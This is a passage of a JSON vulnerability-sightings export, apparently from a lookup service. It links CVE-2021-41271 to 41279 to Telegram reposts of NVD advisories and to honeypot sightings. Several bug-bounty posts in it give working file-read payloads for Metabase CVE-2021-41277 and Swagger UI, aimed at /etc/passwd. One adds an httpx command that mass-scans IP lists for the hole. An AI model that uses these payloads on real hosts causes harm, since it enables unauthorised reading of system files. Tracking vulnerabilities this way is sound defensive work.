"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41272", "type": "seen", "source": "https://t.me/cibsecurity/33892", "content": "\u203c CVE-2021-41272 \u203c\n\nBesu is an Ethereum client written in Java. Starting in version 21.10.0, changes in the implementation of the SHL, SHR, and SAR operations resulted in the introduction of a signed type coercion error in values that represent negative values for 32 bit signed integers. Smart contracts that ask for shifts between approximately 2 billion and 4 billion bits (nonsensical but valid values for the operation) will fail to execute and hence fail to validate. In networks where vulnerable versions are mining with other clients or non-vulnerable versions this will result in a fork and the relevant transactions will not be included in the fork. In networks where vulnerable versions are not mining (such as Rinkeby) no fork will result and the validator nodes will stop accepting blocks. In networks where only vulnerable versions are mining the relevant transaction will not be included in any blocks. When the network adds a non-vulnerable version the network will act as in the first case. Besu 21.10.2 contains a patch for this issue. Besu 21.7.4 is not vulnerable and clients can roll back to that version. There is a workaround available: Once a transaction with the relevant shift operations is included in the canonical chain, the only remediation is to make sure all nodes are on non-vulnerable versions.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-14T00:13:33.000000Z"}, {"uuid": "2c96067a-0fee-4d3e-b86b-0768cda461df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41279", "type": "seen", "source": "https://t.me/cibsecurity/32999", "content": "\u203c CVE-2021-41279 \u203c\n\nBaserCMS is an open source content management system with a focus on Japanese language support. In affected versions users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-26T20:29:51.000000Z"}, {"uuid": "f0131695-cdc5-480e-8dd0-1faf12303538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41278", "type": "seen", "source": "https://t.me/cibsecurity/32669", "content": "\u203c CVE-2021-41278 \u203c\n\nFunctions SDK for EdgeX is meant to provide all the plumbing necessary for developers to get started in processing/transforming/exporting data out of the EdgeX IoT platform. In affected versions broken encryption in app-functions-sdk \u00e2\u20ac\u0153AES\u00e2\u20ac\ufffd transform in EdgeX Foundry releases prior to Jakarta allows attackers to decrypt messages via unspecified vectors. The app-functions-sdk exports an \u00e2\u20ac\u0153aes\u00e2\u20ac\ufffd transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user may expects due to a broken implementation. Version v2.1.0 (EdgeX Foundry Jakarta release and later) of app-functions-sdk-go/v2 deprecates the \u00e2\u20ac\u0153aes\u00e2\u20ac\ufffd transform and provides an improved \u00e2\u20ac\u0153aes256\u00e2\u20ac\ufffd transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new \"aes256\" transform.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-19T02:16:10.000000Z"}, {"uuid": "c50d1a47-d8c7-4ce4-8e0f-0f3202ae03a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/cibsecurity/32567", "content": "\u203c CVE-2021-41277 \u203c\n\nMetabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you\u00c3\u00a2\u00e2\u201a\u00ac\u00e2\u201e\u00a2re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T22:20:55.000000Z"}, {"uuid": "50f61aee-5dd6-4cc4-9e68-622d3f5370ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41275", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/32557", "content": "\u203c CVE-2021-41275 \u203c\n\nspree_auth_devise is an open source library which provides authentication and authorization services for use with the Spree storefront framework by using an underlying Devise authentication framework. In affected versions spree_auth_devise is subject to a CSRF vulnerability that allows user account takeover. All applications using any version of the frontend component of spree_auth_devise are affected if protect_from_forgery method is both: Executed whether as: A before_action callback (the default). A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). Users are advised to update their spree_auth_devise gem. For users unable to update it may be possible to change your strategy to :exception. Please see the linked GHSA for more workaround details. ### Impact CSRF vulnerability that allows user account takeover. All applications using any version of the frontend component of `spree_auth_devise` are affected if `protect_from_forgery` method is both: * Executed whether as: * A before_action callback (the default) * A prepend_before_action (option prepend: true given) before the :load_object hook in Spree::UserController (most likely order to find). * Configured to use :null_session or :reset_session strategies (:null_session is the default in case the no strategy is given, but rails --new generated skeleton use :exception). That means that applications that haven't been configured differently from what it's generated with Rails aren't affected. Thanks @waiting-for-dev for reporting and providing a patch ? ### Patches Spree 4.3 users should update to spree_auth_devise 4.4.1 Spree 4.2 users should update to spree_auth_devise 4.2.1 ### Workarounds If possible, change your strategy to :exception: ```ruby class ApplicationController < ActionController::Base protect_from_forgery with: :exception end ``` Add the following to`config/application.rb `to at least run the `:exception` strategy on the affected controller: ```ruby config.after_initialize do Spree::UsersController.protect_from_forgery with: :exception end ``` ### References https://github.com/solidusio/solidus_auth_devise/security/advisories/GHSA-xm34-v85h-9pg2\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T22:15:07.000000Z"}, {"uuid": "9c4e1a8e-115d-4fde-9d65-de7052f1543f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41274", "type": "seen", "source": "https://t.me/cibsecurity/32543", "content": "\u203c CVE-2021-41274 \u203c\n\nsolidus_auth_devise provides authentication services for the Solidus webstore framework, using the Devise gem. In affected versions solidus_auth_devise is subject to a CSRF vulnerability that allows user account takeover. All applications using any version of the frontend component of `solidus_auth_devise` are affected if `protect_from_forgery` method is both: Executed whether as: A `before_action` callback (the default) or A `prepend_before_action` (option `prepend: true` given) before the `:load_object` hook in `Spree::UserController` (most likely order to find). Configured to use `:null_session` or `:reset_session` strategies (`:null_session` is the default in case the no strategy is given, but `rails --new` generated skeleton use `:exception`). Users should promptly update to `solidus_auth_devise` version `2.5.4`. Users unable to update should if possible, change their strategy to `:exception`. Please see the linked GHSA for more workaround details.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T22:14:48.000000Z"}, {"uuid": "4cf6cf57-8033-4570-ad74-f386e6f5428c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41271", "type": "seen", "source": "https://t.me/cibsecurity/32467", "content": "\u203c CVE-2021-41271 \u203c\n\nDiscourse is a platform for community discussion. In affected versions a maliciously crafted request could cause an error response to be cached by intermediate proxies. This could cause a loss of confidentiality for some content. This issue is patched in the latest stable, beta and tests-passed versions of Discourse.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-17T16:20:35.000000Z"}, {"uuid": "3821b76d-e1b8-4860-80f0-bade290c1829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-17)", "content": "", "creation_timestamp": "2026-05-17T00:00:00.000000Z"}, {"uuid": "cc71c2b6-7aa8-43cb-8951-d5f57e9db11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1642", "content": "#CVE-2021\n\nIt is a nmap script for metabase vulnerability (CVE-2021-41277)\n\nhttps://github.com/frknktlca/Metabase_Nmap_Script\n\n@BlueRedTeam", "creation_timestamp": "2022-01-19T18:55:18.000000Z"}, {"uuid": "2d2b51fb-c371-40db-99c4-b18bb59a5586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4802", "content": "#exploit\nCVE-2021-41277:\nMetaBase Arbitrary File Read\nhttps://github.com/0x0021h/expbox/blob/main/CVE-2021-41277.yaml", "creation_timestamp": "2021-11-21T13:45:01.000000Z"}, {"uuid": "ad5a6427-0605-4c1c-bb7c-d8e60321dece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/4889", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Nov 1-30)\nCVE-2021-22205 - GitLab CE/EE RCE\nhttps://t.me/cybersecuritytechnologies/4602\nCVE-2021-30883 - iOS IOMFB Vuln\nhttps://t.me/cybersecuritytechnologies/4497\nCVE-2021-3064 - Memory Corruption in PAN-OS GlobalProtect Portal/Gateway Interfaces\nhttps://t.me/cybersecuritytechnologies/4724\nCVE-2021-41379 - Windows Installer LPE\nhttps://t.me/cybersecuritytechnologies/4813\nCVE-2021-42321 - MS Exchange Post-Auth RCE\nhttps://t.me/cybersecuritytechnologies/4809\nCVE-2021-40539 - Zoho ManageEngine Auth. Bypass\nhttps://t.me/cybersecuritytechnologies/4718\nCVE-2021-41277 - MetaBase Arbitrary File Read\nhttps://t.me/cybersecuritytechnologies/4802\nCVE-2021-43267 - Remote Kernel Heap Overflow in TIPC\nhttps://t.me/cybersecuritytechnologies/4678\nCVE-2021-42574 - Unicode Bidirectional override vuln\nhttps://github.com/js-on/CVE-2021-42574\nhttps://github.com/pierDipi/unicode-control-characters-action\nCVE-2021-24084 - Windows MDM LPE\nhttps://t.me/cybersecuritytechnologies/4850", "creation_timestamp": "2021-12-03T11:00:35.000000Z"}, {"uuid": "57f6ac9f-112f-4fa7-8b0f-301405828969", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-09)", "content": "", "creation_timestamp": "2026-05-09T00:00:00.000000Z"}, {"uuid": "7ae0a2df-eda6-4487-bcdf-b4bfefb6ec1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/641", "content": "#BugBountyTips of the Day\nNew Feature Alert \ud83d\udea8  [ --SQLi ] Support #MySQL mod_Security & libinjection bypass [** New **]  Have a look :  https://t.co/9ZLO4pJsuG  $ bash  https://t.co/oGQuTKBBAs -u  https://domain.tld/secret --SQLi #bugbountytips #bugbountytip #bugbounty #infosec #cloud #cybersecurity  https://t.co/RKjXMaF2tw\n---\n#BugBounty #bugbountytip #infosec - Do you want to get all subdomains of a host, get the open ports of all of them (using IP address deduplication), and check if there's an HTTP service running? Use the set of tools included in the screenshot! Links in the comments.  https://t.co/qC0FVQCDzA\n---\nPassword reset token was getting leaked in the forgot password Request itself as well as on other endpoint '/verify/'. 2x bounty.@SynackRedTeam #bugbountytips  https://t.co/UYOEXKPAve\n---\nBest of YouTube Channels for Pentester (Part 3)   https://t.co/70lBKdBw16  https://t.co/cRhoJ6D0fC  https://t.co/IeZHpjoDjR  https://t.co/qQRG02wVHv  @rot169 @0xConda @rana__khalil @NahamSec #infosec #cybersecurity #pentesting #oscp #bugbounty\n---\nEl Curso Virtual de Hacking con Kali Linux est\u00e1 disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics \u2623 \u2705 M\u00e1s informaci\u00f3n en:  https://t.co/lsfm4jifRQ  https://t.co/pyXzMnVOyv\n---\nBest of Web Penetration Testing (Part 4)  Credit @trbughunters   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytip4  https://t.co/6bPVxzGUTI\n---\nSmall to medium size businesses are using WordPress, Learn how to recon and hack WordPress websites in a legal penetration testing environment. #bugbountytips #infosec  https://t.co/QpGPHxs7H6\n---\nAPI Security Checklist\ud83d\udd25   https://t.co/7tW3yfUsEy  #bugbounty #bugbountytips #apisecurity #apipentesting #checklist\n---\nCVE-2021-41277 MetaBase Arbitrary File Read  MetaBase < 0.40.5 1.0.0 <= MetaBase < 1.40.5   https://t.co/TtJHu6lvr1  PoC: GET /api/geojson?url=file:/etc/passwd HTTP/1.1  #CVE #BugBounty #bugbountytips #infosec #vulnerable", "creation_timestamp": "2021-11-22T13:37:04.000000Z"}, {"uuid": "5b54b1f6-6038-4c88-9bfe-13ea18bd2e0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/644", "content": "#BugBountyTips of the Day\nYay, I was awarded a $7,500 bounty on @Hacker0x01 !  https://t.co/omBwPCLeT7 #TogetherWeHitHarder with @naglinagli   @YahooSecurity and @TheParanoids  once again show why they can be the best program to hack on, and are one of the most fair programs around.  #BugBounty\n---\nLFI in #SwaggerUI   #bugbountytips   #bugbountytip  add this payload for your LFI word list   /v1/docs//..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\/etc/passwd HTTP/1.1  #NOTE its not working from browser  https://t.co/RKUhGwEmSZ\n---\nBest of SSRF Cheatsheet  Credit @d0nut  #infosec #cybersecurity #pentesting #oscp #cheatsheet #burpsuite #bugbounty #bugbountytips #ssrf #vulnerabilities  https://t.co/4orqpOIEIQ\n---\n#bugbountytips #bugbounty #CVE-2021-41277 Metabase Custom GeoJSON Map file inclusion    https://domain/api/geojson?url=file:///etc/passwd   httpx -l IPlist.txt -follow-redirects -title -path /api/geojson?url=file:///etc/passwd -match-string \"root:x:0:0\"  https://t.co/TnXoIpVvfd\n---\nI am predicting this to be an excellent #book to add to your 2022 list for #webapp #security and #bugbounty hunting. Thank you Corey Ball for sharing your knowledge on this important topic!  #infosec #recon #pentest #api #bugbountytips #websecurity   https://t.co/BVFL57rKx1", "creation_timestamp": "2021-11-23T13:37:04.000000Z"}, {"uuid": "899437f7-bd1c-48fb-bd3d-49f22fe9a9f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/bhhub/640", "content": "#BugBountyTips of the Day\nFew months ago i was awarded $10,000 from microsoft for finding a security vulnerability on their web application. now the bug has been patched and got the acknowledgment on their HOF :)  #bugbounty #cybersecurity #news #microsoft #ethicalhacking #bugbountytips #bounty  https://t.co/BCCG7TzP8w\n---\nRed Team Toolkit \ud83e\uddf0 - An Open-Source Django Offensive Web-App that contains useful offensive tools used in the red-teaming activity.  \u00bb  https://t.co/nl4OewP3f5  #cybersecurity #infosec #security  #cyber #informationsecurity #redteam #redteaming #bugbounty #bugbountytips  https://t.co/3ZEmmOSpyo\n---\nJust published a write-up on Account Takeover due to OAuth Misconfiguration + CSRF + XSS and Weak CSP.    https://t.co/lslyFhDmbF  #Pentesting #hacking #cybersecurity #infosec #bugbounty #bugbountytips\n---\nReally excited for this Precious gift from GoogleVRP team.   Thanks for selecting me.  #infosec #googlevrp #bugbounty  https://t.co/jVFi2IxgMG\n---\nBest of Web Penetration Testing  Credit @sec_r0   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/nPepuxs3WR\n---\nBest of Web Penetration Testing   Credit @sec_r0  #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/jq1DnJ34gl\n---\nThere are more than 17k publicly accessible Metabase instances on shodan and few BB programs that were affected as well, the fix is super easy for  CVE-2021-41277 and the impact is CRITICAL, so I'd advise patching quickly  : )  #bugbounty  https://t.co/FPQTir4bE2\n---\nwhich wordlist you use for subdomain brute !!!  #bugbountydiscussion #bugbounty #infosec\n---\nI've pushed a nuclei template to detect this misconfiguration An unauthenticated api endpoint requiring a URL parameter, with insufficient validation that lead to LFI. ( CVE-2021-41277 ).   https://t.co/shrTv2gr85  Source :  https://t.co/ByzKbMFX8m  #bugbounty #bugbountytips 1/2  https://t.co/r72gDHNYWt\n---\nBest of Web Penetration Testing (Part 3)  Credit @hackerscrolls   #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #burpsuite #bugbounty #bugbountytips  https://t.co/1WuKhFEXMa", "creation_timestamp": "2021-11-21T13:37:04.000000Z"}, {"uuid": "e2c692ef-2512-44c0-928d-96f084ffa428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-29)", "content": "", "creation_timestamp": "2026-05-29T00:00:00.000000Z"}, {"uuid": "2e2019dd-2c10-422c-84bc-0f33d2c47870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-18)", "content": "", "creation_timestamp": "2026-05-18T00:00:00.000000Z"}]}